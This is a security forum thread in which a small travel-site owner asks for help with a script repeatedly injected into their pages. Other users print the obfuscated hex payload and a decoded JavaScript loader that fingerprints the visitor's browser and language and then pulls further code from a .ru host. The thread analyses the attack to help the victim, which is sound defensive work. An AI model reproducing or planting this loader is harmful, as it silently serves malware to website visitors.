Website got hacked

Malware Related > Compromised Servers

Website got hacked

(1/2) > >>

samibdr:
Hello,
We had a problem recently about someone installing a script on our website. we had removed the script from all pages manually, changed hosting provider & changed all the password. today it happened again and they managed to install the same script. this script is calling another script from ujnc.ru, jkn3.ru, porv.ru, ujnc.ru and more... the script that is called from these websites is called JS.js.

Beacause of this script, our website was marked as harmful on google and we are losing clients. i'm not sure what this script is doing. i would appreciate some feedback on whats happening here.

Orac:
Can you provide a link to your website, and also the links to the scipts their trying to install on your server ??

samibdr:
my website is maltatravelnet.com
link to the script are:

http://www.jkn3.ru/js.js
http://www.ujnc.ru/js.js
http://www.porv.ru/js.js

i dont think the links are working now but this morning they where, and i saved the js file to my PC. i zipped & uploaded it here:
www.sb-websolutions.com/1.zip

i also inlcuded our index.htm file. you will find the script that its calling the js file at the bottom of the source code.

please tell me what is this js file doing to our website as i dont know Javascript.

Thanks

MysteryFCM:
The following is what the script gets;

--- Code: ---*****************************************************************
vURL Desktop Edition v0.3.4 Results
Source code for: http://okcd.ru/cgi-bin/index.cgi?ad
Server IP: 70.126.163.53 [ 53-163.126-70.tampabay.res.rr.com ]
> 122.100.67.72 [ 122-100-67-72.cm.ubbn.net ]
> 69.133.138.54 [ cpe-069-133-138-054.ec.res.rr.com ]
> 67.70.151.9 [ bas5-toronto12-1128699657.dsl.bell.ca ]
> 24.173.57.194 [ rrcs-24-173-57-194.sw.biz.rr.com ]
> 98.233.229.119 [ c-98-233-229-119.hsd1.md.comcast.net ]
> 88.2.47.117 [ 117.Red-88-2-47.staticIP.rima-tde.net ]
> 72.51.179.194 [ host-72-51-179-194.newwavecomm.net ]
> 24.57.105.118 [ d57-105-118.home.cgocable.net ]
> 24.226.26.87 [ d226-26-87.home.cgocable.net ]
> 86.14.232.146 [ cpc5-cmbg4-0-0-cust145.cmbg.cable.ntl.com ]
> 76.248.170.0 [ adsl-76-248-170-0.dsl.chi2ca.sbcglobal.net ]
> 88.250.184.95 [ dsl88-250-47199.ttnet.net.tr ]
> 75.143.150.108 [ Resolution failed ]
> 76.124.4.21 [ c-76-124-4-21.hsd1.nj.comcast.net ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 1
iFrames: 0
Date: 18 August 2008
Time: 15:39:25:39
*****************************************************************
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title></title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<script type="text/javascript">

</script>
</head>
<body onload="b40R3eLSm('98ACAFA6A899A4B452B07373657d787B7f6e6999A6a3797A6389B7B66050798FA3A98Ab47f71666FadadA2b5547bADBA8299B6ab817255835298b3AAa99d9aB4A6AA6fA6959ca1ab9772b7A4a6508c7Ba56997AB81676c666F57ADB29791A9AFA1A56fABA6959B817dAFb59396a59D9374577E637fA8a99694ACA990765ea9B585abb3acA2975D6F6d82B9b78492aaae7f796180547badBA8299b6ab81725571528e76b666869D93696e7cb995A255b86586728a9F678B895274618EACa485a8a79F8E8562a29ab69E98a4A85C5f919d619E6D6356525e81a46A90747B9b6c9c75577e63A663847779A27899775ea9B587A7b1A8a67396b9975f6a7Eaa91A766758375a882937DAC67577E6368626E7a6B6D78756d6670BC93a961996c6067AF896AB3AD546d55B497ae6184a6A296bf6D9DB0B55CA696B8528183946899969782826180546070667c7992779d9186967d577d6366656B81528183946899969782826C6E5D50B09C6a6773AC8B63a7B08d8183946899969782829e6371506581afadA2B5548989b896A09977A463558352687ca9A3A25dBC93A9618D768169AF9388918E546D5577646f7c637e72867a9B9892937F6B5590748875AC9581859152757F8054615E66AD9095B598998D7AA26a6180548989b896a09977A463558470756174548E556e8b8bB3a79D8869b665576763655074666570797b666967796A6b617d54605e8198A6B36Baa91A766a59Fa3BC8A68669b62577E63646B55B99A99BA996c618A765273617569667066A59fa3bc8a68669B62576c80547a779766a0a294847B557052696A63afA696b8529E85799e6667ab777A6180547a779766a0A294847B557152AAa9a5ad866d7787677c996c6067AF896ab3ad8F97797C9C6D73a8797392666F57977B64629e9D65a9AB9ea79897bf886F7298648d55A4529095B598998D7AA26a7CAC9a505d9c6A6773AC8b63a7b08D9e85799E6667ab777A9e637050656F52B2977B64629E9d65A9AB9e9B746bb06869A688778D55716f57848f689583a97A9d767eB1ADb2bc93A9618983836787988d72A6546D55897E6Ba69197789B7b526461746f96a4b85aADa2B554A26aB663a171786962558352677c63a665a5779c67767866507166A46A90747b9b6c9c7565adA8A297a9ae6D57B378A4619F76676C736E5F5955c1a898B36396617Bb76279828e805072665A7d909666719B9C639A61a154a26895637Eac7a8a7363A99A98B386A3949A87a65Fb378A4619F76676C736C5d505B66646C767E7A7F8878739d9774975072665a7d909666719b9C639a6181726e557e5B579f638A6865789b8E74b59e8B977778a87185757B81a36dB48792876276ac8868A46371507b95856982A98A6198669057698680649a94957FA778545d55775b72aaa954587b95856982a98A6198666e57716c54AB7b95856982a98A6198665d74618680649a94957Fa7786fAD7B95856982a98a6198666F578792876276AC8868a471a89F88BAa4a0afaa5c616B6F60ABb098a4A09AB87598b4a85C5970bd9Aa0adA85C7684996478A799659363b297a5A8b79c5071666a6061BE7A7f8878739d977497507266546763635f507B95856982a98A619881afadA2B554936DBA7E9f85afA467558352A5A6BA5471a7B893b07Ca9a3a25Dbc93a9618d768169AF9388918e546d55766D578B8585649Ea783878c6370506D81528183946899969782826C6E5d50B0A96AAB8dab789Ca57d8d8183946899969782829E6371507B95856982a98A619874959FA2B5779f99AB73AB698d768169AF9388918E5d6bb2bc93a961867b8485BB676eB7b6546D55685472B7A4A650ac9A746B927a6A859c666F57717E9A9FA76eA898b3637E72867A9b9892937f5072666272618D768169af9388918e546C559cA4AA85776582ABb960A3A6b19Ba49d8152818394689996978282616e7150676FADadA2b55497797C9C6d73a879735583528DB3b678646698A8aa6fB6a992a8baA45F8b8585649Ea783878C6f54625E81a898b3637A896D9F7eA583B179507266a298B3b69979a3ba5A9E85799e6667ab777a6d6365665E81a898b3638664968F6a6B8C8F645072667890799c809E77B477576E639768a9929A7bADb36B8BAC9A746B927A6A859ca36dA0a76b8664968F6A6B8C8F64507166626061BE8664968f6A6b8c8f64507266846BA28c6c64809262576C6366656B81AF7a889784a56a7da8aa616E715088BAA4A0AFAA6296A7b59F7aa9A4a673A4AA975F937795796d7a7d83716c6f999b6Ea98B837785676B9b99576C6365507283529a79B7809879B2A26e6FAF999E9cba9A6061BEAB84777A836E77989b5072666272BE63999CA8ab52b2b8977664867D688ca86e5f6bb2C3A898B36382776ABF93988BB2695072666272b5b5ad50B0ABA898ad6B77778996a76C78B9A75970C3529Aa2B797985dab5B57bc917B65AEa79381B078546d55776DB4b5B5ad50b0AF985769917B65aea79381b0785d50B0bd9bA5a5B2AB5Ea1b59598B5acA39e5583525970656Fadb2669598B5A69C589A6F52b2bec03Ea967766384847881675d6D936dA27b7567967F6b9b7a7c966297a769677A7596957688686E7aA46d6497AC7479767C6c616a7a686877a969616a76667D757695946e87676776A66a65768794687A86766976776b6c827576686C7a939877a676756b7a686D77856c966D886899767c969669776598757468757789736a82856A646Ca76979787a6b646eaa6b6Ca27a76656BAC659B74a89691967D946B767C966676776869777C6C686Dac736e7a736A646c7767678275756577897379a2737565967e6B7dA2796B62767D9469827c6d616Eaa6B9c827696666Ea9936E828576676Eaa6B9DA2756b766A79667a82899565767C6767787896656D8A6b697a866d916d79736D76776c616b7c689D77A4696168AB736d7a7896666b7C6B68a2736c666C7F6A6D7a896c917779686978796a646A7c686777786a666d77667D7576696168AB936e7Aa675749778936e77746a936C7B936878856D64767f6b6F797B76716a7a689B767796669779696B77a86C686C8A6B6c79856B62768C74677a8775697689697D7AA46A936B7E699B79a66d646A7C677a76776c65977d6a70797C75676d87699d82846a966c7D687977756A646A7b689b76776b616c7d6899767C96966977659874a77671967d746b767c6d686e7f6A6a82786D616C7d9499797a6a646c776767827996616c7e696E78A76C746e7f6A6E7775756796ab736aa2a56C65767e676f787876656d8A6B697A866D916D79936d76896B676bac697B7579689569776578748775747689686977746D686e7F6A6a82786D616C7d7479797A6A646c77687B76776a666C7D686B7775696168AB657074A76d6396AA6A6B78886d716e8C696Da2746A646D79686976a56b646b7c676977a969616a7666997AA87660967d6b6c7677959496a9686977746D686E7f6A6Aa2786d616c7D7479797a6A646c77687b76776A666C7e686b77756961688B657074A76D6396aa6a6B78A86D916Eac696dA2746a646d79686976A56b646b7D676977a969616a7666997A889660767D6b6C767775747689686977746d686E7F6A6AA2786D616c7D9499797A6a646C77687B76776A666c7F686b77756961688b657074a76D63768a6A6B78886D716e8C696da2746a646d79686976A56B646B7e6769778969616a7666997Aa89660967d6b6c7677757496a9686977746D686E7f6A6AA2786D616c7D9499797a6a646c77687B76776a666c87686b77756961688B657074A76D6396aa6a6B78a86D916eac696d82746a646D79686976856b646b7f6769778969616a7666997a889660767D6b6c7677959496a9686977746d686E7F6a6a82786D616c7D9499797a6a646C77689B76776A666Ca8686b7775696168ab657074A76d63768A6a6B78a86d916E8C696d82746a646D79686976856b646B876769778969616A7666997AA87660967D6b6C767795947689686977746D686E7f6a6a82786d616c7D7479797A6A646C77689B76776A666Ca9686b77756961688B657074876d6396AA6A6B78886D916e8c696da2746a646D79686976856b646B886769778969616a76669D757668746eaa6B6d76776A936e7b937078856c696d876B9978A476616b7C686A78796A646A7c686777786a666bAC669D7576689468AA6B69a2797569967d939B78776961688B939B757468756A79667aA27575716a7A676f797695926d7e6a6E79A995966c876b7b76776c616d79686976A56B646b7b676976776a716ba96869A2A576616B7C686C787b6C7496A86b70777A959496786b6B7a7c76736e7B936f77746a666D7c6b6ca2739569967D946c7Aa86A646c7D6B6882759568768C736d7aa496686e7F676977736A646c7C6879767c6A656C77676777746B656BAC667D757668946D796B6E78796C696e89737B788996616a7A689B76776A666c7c699876856b9669776578757468956A79667a82897565767C676778786B696DA96A9ca2746D686b876B6976776C616b7c74677aa476716e8A6B6e7a789668777b946b777A7667768a736a827b956997796A9C7a8496626E88736C7A78757276886967A2a696696E7C936aA27b76666bAB696977786A646B7b686776a76B766a79667aA2a97565967C6767797B95947876936cA3766b64767A6B6D76776C616B7c686b76a56b9669776578757468956a79667A7A899663967C676f82849565977E6869797495656C87696d798576686DAB746778796B646Bac696F7A786C716Da96B7082876C939678687A78786b696Da96A9CA2746d686B876B697775966076889467A27376686EA9687978a695656D896a6f7a7376686Ca96b7c76A96a766bAC686983776961688B65707aa66d6296a8939C79A776726B7a736e76776c616B7c6A6a77a86C716d766B6f797B6B91767e69677A8695936e7b7369787a76637687936e788496686AA9696f7a786c916D896b70A2A76C737678677077757668777b6B6ca2a776666Eaa6B9c7A856A736C7d696f77756B966977659875746875698C73797A896A646A896b6F7975956977786b6D83736B647688676778736a646C7e68997579687568AA6570797B75749876936CA3766B64767a6B6D76776A966d79686976856b646A7c6879757468956A79669a75756d686EAA93987A7a76756c7C94697A896A646A8C689B767795936E7a936e82786d6896a8686782856B766a79667Aa379696168ab657B74A89692768b7379827875696A896a6b7A877675767f949A777C96646EA7677ca2739569777a7370A2a775736A7a687a76776B666C7C68797579687568AA6a6b7A877675967f949a777C76646E87676776a96C616b7C686b777C6b646A7C6879757468756A79669a7579687596A76b68A2796A646da96a7B78866b646DA86A6aA27576656B7c697d767c6d636E886969787c6d7177776a6f82796A646A8c6767797b75749876936c83766B64767a6B6d77A969616A76946F7Aa496666A7A936B79876c65767f6b69797995916e7b676778746a6496A794687aA6766996776b6cA27596686C7A736cA2A575696E7B936B7a7C6C699778936E827975699678936b76A66A66977f936CA2a57574967A936B76796a946D77669d757696686daa69687A7a6d646E79936f7a846B62767D6b6cA27B6C657787746Da2a575746e7c936c827b95696b8b686ba2A77674967a6b6c76796b606B7c686b828775697689736B77767575967D746f7a8476676e7d73697aA776647787686B77756b7669776598827B6D946d7D736c797C6d616e876b68777596677688746d78a47668767E73697aA7756697a8746d7aa86A936a7c936A827975676b7E689c767C6A666eA9936b827b96646D766968777b96636e8C6b6a7a7B6b62977e746e777b75676EA86B7077747566768c9467777B757496786b6b7A7c96936c7a736C827375746c796870777a6B656c7D69787a8975676B87686777786b646C7C936F777C6B916B7A686777776B726caa936e777C75696e7e686C77866b646C896969777c6b646B7A686777776b646C7c696977A575686E7c6b6977A675656c8a696D787375716E87676976776a966B7c6a6f79776c676B7a6A6e797a7662977d689978776961688b6b6b8276956797A8737D7A889662767e679C7A79966376877479777a9565767A73677A7c966276876a6C8274757476766B6B76a676686eac6a6a7aa66D646D776B6D7A786a746D77667D7576776169776578686c6F')">

</body>
</html>

--- End code ---

I can't get it to decode any further however.

bobby:
This is the decoded script:

--- Code: ---document.Yzw7fPyy = 1;
if (!document.h3z067KE) {
var FKC0WSnq;
var rm25DIeW = navigator.appMinorVersion;
var AqGPcVOv = -1
var OgBEVkFm = "01";
while((AqGPcVOv = rm25DIeW.indexOf(";SP", AqGPcVOv+1)) != -1) {
var TeSqM1yN = rm25DIeW.charAt(AqGPcVOv+3);
if (TeSqM1yN == "1")
OgBEVkFm = "02";
else if (TeSqM1yN == "2")
OgBEVkFm = "03";
else if (TeSqM1yN == "3")
OgBEVkFm = "04";
else if (TeSqM1yN == "4")
OgBEVkFm = "05";
else if (TeSqM1yN == "5")
OgBEVkFm = "06";
else if (TeSqM1yN == "6")
OgBEVkFm = "07";
if (OgBEVkFm != "01")
break;
}
if (OgBEVkFm == "01" && rm25DIeW.indexOf("Release Candidate", 0) != -1)
OgBEVkFm = "08";
var A5FLhT6b = navigator.systemLanguage.substr(0, 10);
var Tizcz0pf = "";
for(var HaFFWtHn=0;HaFFWtHn<A5FLhT6b.length;HaFFWtHn++) {
hNelTw0w = A5FLhT6b.charCodeAt(HaFFWtHn).toString(16);
if (hNelTw0w < 2)
Tizcz0pf += "0";
Tizcz0pf += hNelTw0w;
}
while(Tizcz0pf.length < 20)
Tizcz0pf += "00";
var FKC0WSnq = OgBEVkFm + Tizcz0pf;
var tYAcPMfa = document.createElement("script");
tYAcPMfa.setAttribute("type", "text/javascript");
tYAcPMfa.setAttribute("src", "http://juc8.ru/cgi-bin/index.cgi?3c42f2a30100f0600077e0ed580660b8ab990274ebb2a0ff" + FKC0WSnq);
document.body.appendChild(tYAcPMfa);
}

--- End code ---
Sorry, I do not have time now to calculate the download link, but I saw something interesting - the script will load only if the system language is set to far east Asian languages (Chinese and countries around China).

Navigation

[0] Message Index

[#] Next page

Go to full version